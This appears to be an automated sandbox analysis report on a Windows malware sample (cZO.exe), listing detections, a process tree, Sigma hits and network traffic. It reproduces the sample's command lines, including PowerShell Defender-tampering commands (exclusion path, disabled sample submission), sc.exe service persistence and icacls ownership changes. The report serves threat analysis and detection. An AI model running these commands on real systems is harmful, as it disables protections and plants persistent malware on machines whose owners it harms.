Windows Analysis Report
cZO.exe

Overview

General Information

Sample name: cZO.exe
Analysis ID: 1584500
MD5: be6e88537235ff3b6b61de70dfeecb3b
SHA1: 4a622aa9cbbb7f66484734b85a211f20e0cb0edd
SHA256: bc1a44614123c841e31835919a21ed7322ea6537f6652f36d24fd7f83a440294
Tags: exe, I2Parcae, user-aachum

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Performs DNS queries to domains with low reputation
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
Uses TOR for connection hiding
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • cZO.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\cZO.exe" MD5: BE6E88537235FF3B6B61DE70DFEECB3B)
  • cZO.exe (PID: 5660 cmdline: C:\Users\user\Desktop\cZO.exe MD5: BE6E88537235FF3B6B61DE70DFEECB3B)
    • cmd.exe (PID: 6536 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7088 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6472 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 432 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • shdpeqdz2a54sj46ur0.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)
      • taskkill.exe (PID: 3652 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4324 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • main.exe (PID: 6524 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
          • WerFault.exe (PID: 5688 cmdline: C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • sc.exe (PID: 6448 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5880 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1716 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5308 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5492 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5548 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 4324 cmdline: C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 4124 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • main.exe (PID: 3688 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: sc.exe stop RDP-Controller, ParentImage: C:\Windows\System32\sc.exe, ParentProcessId: 4324, ParentProcessName: sc.exe, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 6524, ProcessName: main.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7088, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, ParentProcessId: 7088, ParentProcessName: shdpeqdz2a54sj46ur0.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6448, ProcessName: sc.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 95.216.2.172, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 6524, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49856
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 432, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, ParentProcessId: 7088, ParentProcessName: shdpeqdz2a54sj46ur0.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6448, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7088, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 5548, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: https://reseed.diva.exchange/b.c | Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/i2pseeds.su3 | Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org:443/i2pseeds.su3 | Avira URL Cloud: Label: malware
Source: https://login.live | Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/P# | Avira URL Cloud: Label: malware
Source: https://reseed.diva.exchange/ | Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/ | Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/ | Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/i2pseeds.su30 | Avira URL Cloud: Label: malware
Source: https://netdb.i2p2.no/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Avira: detection malicious, Label: TR/AVI.Agent.jibab
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll | ReversingLabs: Detection: 26%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll | ReversingLabs: Detection: 31%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | ReversingLabs: Detection: 69%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll | ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | ReversingLabs: Detection: 57%
Source: C:\Windows\Temp\I77yQ5in | ReversingLabs: Detection: 26%
Source: C:\Windows\Temp\YXkdIYk6 | ReversingLabs: Detection: 69%
Source: C:\Windows\Temp\YkhL6reh | ReversingLabs: Detection: 31%
Source: cZO.exe | Virustotal: Detection: 19%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\cZO.exe | Unpacked PE file: 0.2.cZO.exe.2510000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | File created: C:\Users\user\AppData\Local\Temp\installer.log
Source: Binary string: RfxVmt.pdb source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: Binary string: RfxVmt.pdbGCTL source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B915387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B915387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8B915387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FF8B915387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | Code function: 6_2_00007FF775723DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,6_2_00007FF775723DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF6BE031CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF6BE031CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BA4F4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA4F4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 32_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 22_2_00007FF6BE03737B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 22_2_00007FF8B915A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 22_2_00007FF8B9187DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 22_2_00007FF8BA4F967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 22_2_00007FF8BFB39BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 22_2_00007FF8BFB5A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 22_2_00007FF8BFB8293B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 32_2_00007FF8B915A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 32_2_00007FF8B9187DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 32_2_00007FF8BA50967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 32_2_00007FF8BFB39BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 32_2_00007FF8BFB5A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Code function: 4x nop then lea r9, qword ptr [r8-01h] 32_2_00007FF8BFB8293B

Networking

Source: global traffic | TCP traffic: 95.158.36.98 ports 0,1,2,30125,3,5
Source: global traffic | TCP traffic: 107.189.28.6 ports 1,2,5,6,9,12596
Source: global traffic | TCP traffic: 69.10.220.235 ports 19348,1,3,4,8,9
Source: global traffic | TCP traffic: 78.191.208.199 ports 0,1,2,3,9,13920
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp | String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reseed.onion.im/i2pseeds.su3
Source: vc71izwl68ub3txurufnpr09g6ni3.exe.1.dr | Static PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: DNS query: reseed-pl.i2pd.xyz
Source: unknown | DNS query: name: reseed.onion.im
Source: unknown | Network traffic detected: IP country count 26
Source: Joe Sandbox ViewIP Address: 31.3.152.100 31.3.152.100
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9152A1A recv,WSAGetLastError,22_2_00007FF8B9152A1A
Source: global trafficHTTP traffic detected: GET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficDNS traffic detected: DNS query: reseed.memcpy.io
Source: global trafficDNS traffic detected: DNS query: reseed-pl.i2pd.xyz
Source: global trafficDNS traffic detected: DNS query: reseed.i2pgit.org
Source: global trafficDNS traffic detected: DNS query: reseed.onion.im
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 05 Jan 2025 16:49:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 05 Jan 2025 16:49:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-Encoding
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2456738676.0000022350291000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456860774.0000022350297000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://127.0.0.1:8118
Source: svchost.exe, 0000001F.00000003.3199473486.000001D37989B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D379382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 0000001F.00000003.3183713515.000001D379377000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3209006685.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
